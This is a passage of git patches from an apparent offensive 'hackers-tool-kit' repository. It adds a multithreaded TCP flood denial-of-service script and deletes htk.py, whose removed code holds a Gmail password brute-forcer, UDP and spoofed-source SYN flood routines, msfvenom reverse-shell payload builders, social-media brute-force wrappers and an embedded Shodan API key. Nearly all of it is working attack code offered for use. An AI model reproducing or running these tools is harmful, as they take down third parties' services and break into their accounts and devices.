Sort out http URI in targets -target = args.target.replace('http://','').replace('https://','') - -if '/' in target and args.http: - path = target[target.find('/'):] - target = target[:target.find('/')] -else: - path = '/' - - -# Decode custom payload -try: - if args.payload: - payload = args.payload.decode('hex') - else: - payload = '' -except: - print('Use hex string format as payload.') - sys.exit() - - -# Check if script is running as root -if geteuid() != 0: - print("Run %s as root." % sys.argv[0]) - sys.exit() - - -# Catch CTRL+C to abort -stop = False -def signal_handler(signal, frame): - global stop - stop = True -signal.signal(signal.SIGINT, signal_handler) - - -# String generator for Cache bypassing on load balancers (Random letters in lenght 3 to 8) -def string_generator(size=random.randint(3, 8), chars=string.ascii_uppercase + string.ascii_lowercase): - return ''.join(random.choice(chars) for _ in range(size)) - - -# Generate HTTP Payload -def http_payload(): - payload = 'GET %s?%s HTTP/1.1\r\n' % (path, string_generator()) - payload += 'Host: %s\r\n' % target - payload += 'User-Agent: Kittenz Launcher!!!\r\n' - payload += 'Connection: keep-alive\r\n\r\n' - return payload - - -# DOS function -def spam(target_ip, payload): - global connected, dropped, payloads - while True: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - # 2 sec TCP timeout - s.settimeout(2) - try: - s.connect((target_ip, port)) - connected += 1 - # Wrap connection with SSL if specified - if args.ssl: - s = ssl.wrap_socket(s, cert_reqs = ssl.CERT_NONE) - if args.http and not args.payload: - payload = http_payload() - s.send(payload) - payloads += 1 - s.close() - except: - dropped += 1 - if stop == True: - break - - -if __name__ == '__main__': - target_ip = socket.gethostbyname(target) - # add IP tables to drop FIN and RST packets towards TARGET - system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) - system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) - # Fire up threads running spam() function - threads = [] - for i in range(args.THREADS): - t = Thread(target=spam, args=(target_ip, payload,)) - threads.append(t) - t.start() - - while True: - # Keep going until ctrl+c is pressed - if active_count() == 1 or stop == True: - # when ctrl+c is pressed, restore IP tables. - system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) - system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) - print("") - break - else: - sleep(0.1) - sys.stdout.write('Connects: %d, Payloads: %d, Dropped: %d \r' % (connected, payloads, dropped)) -sys.stdout.flush() From e79ad3d62cce26ce5b017c974a44eb3ae7c3a7f7 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:17:55 +0100 Subject: [PATCH 028/214] Add files via upload --- tools/tcp | 144 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 tools/tcp diff --git a/tools/tcp b/tools/tcp new file mode 100644 index 0000000..b662c84 --- /dev/null +++ b/tools/tcp @@ -0,0 +1,144 @@ +import socket +from time import sleep +from threading import Thread, active_count +from os import * +import random +import string +import signal +import ssl +import argparse +import sys + +example_text = ''' \nTips: Target page with 1500+ bytes size. +example: + python %s example.com/test.php -p 80 -http + python %s example.com/hello/ -p 443 -ssl -http + python %s example.com -p 80 -http + python %s example.com -p 21 -payload 68656c6c6f + python %s example.com -p 22 +Connects - TCP handshakes towards victim +Payloads - Recevied payloads by victim +Dropped - TCP handshakes or payloads rejected by victim (site down) + +''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0]) + +parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawTextHelpFormatter) +parser._action_groups.pop() +required = parser.add_argument_group('required arguments') +optional = parser.add_argument_group('optional arguments') + +required.add_argument('target', help='Specify a target to attack') +required.add_argument('-p', dest='port', help='Specify port to attack', type=int, required=True) + +optional.add_argument('-t', dest='THREADS', type=int, default=300, help='Threads, default = 300 threads') +optional.add_argument('-ssl', action='store_true', help='Enable SSL') +optional.add_argument('-http', action='store_true', help='Enable HTTP headers (only if custom payload not set)') +optional.add_argument('-payload', help='Set payload as hex-string') + + + +print("\ntcp flood.\n") +args = parser.parse_args() +connected = 0 +dropped = 0 +payloads = 0 +port = args.port + + +# Sort out http URI in targets +target = args.target.replace('http://','').replace('https://','') + +if '/' in target and args.http: + path = target[target.find('/'):] + target = target[:target.find('/')] +else: + path = '/' + + +# Decode custom payload +try: + if args.payload: + payload = args.payload.decode('hex') + else: + payload = '' +except: + print('Use hex string format as payload.') + sys.exit() + + +# Check if script is running as root +if geteuid() != 0: + print("Run %s as root." % sys.argv[0]) + sys.exit() + + +# Catch CTRL+C to abort +stop = False +def signal_handler(signal, frame): + global stop + stop = True +signal.signal(signal.SIGINT, signal_handler) + + +# String generator for Cache bypassing on load balancers (Random letters in lenght 3 to 8) +def string_generator(size=random.randint(3, 8), chars=string.ascii_uppercase + string.ascii_lowercase): + return ''.join(random.choice(chars) for _ in range(size)) + + +# Generate HTTP Payload +def http_payload(): + payload = 'GET %s?%s HTTP/1.1\r\n' % (path, string_generator()) + payload += 'Host: %s\r\n' % target + payload += 'User-Agent: Kittenz Launcher!!!\r\n' + payload += 'Connection: keep-alive\r\n\r\n' + return payload + + +# DOS function +def spam(target_ip, payload): + global connected, dropped, payloads + while True: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # 2 sec TCP timeout + s.settimeout(2) + try: + s.connect((target_ip, port)) + connected += 1 + # Wrap connection with SSL if specified + if args.ssl: + s = ssl.wrap_socket(s, cert_reqs = ssl.CERT_NONE) + if args.http and not args.payload: + payload = http_payload() + s.send(payload) + payloads += 1 + s.close() + except: + dropped += 1 + if stop == True: + break + + +if __name__ == '__main__': + target_ip = socket.gethostbyname(target) + # add IP tables to drop FIN and RST packets towards TARGET + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + # Fire up threads running spam() function + threads = [] + for i in range(args.THREADS): + t = Thread(target=spam, args=(target_ip, payload,)) + threads.append(t) + t.start() + + while True: + # Keep going until ctrl+c is pressed + if active_count() == 1 or stop == True: + # when ctrl+c is pressed, restore IP tables. + system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + print("") + break + else: + sleep(0.1) + sys.stdout.write('Connects: %d, Payloads: %d, Dropped: %d \r' % (connected, payloads, dropped)) +sys.stdout.flush() From 7c99f347f8f93f708a0fd4332c436d6e214406d9 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:18:21 +0100 Subject: [PATCH 029/214] Delete htk.py --- htk.py | 1972 -------------------------------------------------------- 1 file changed, 1972 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 5216985..0000000 --- a/htk.py +++ /dev/null @@ -1,1972 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" 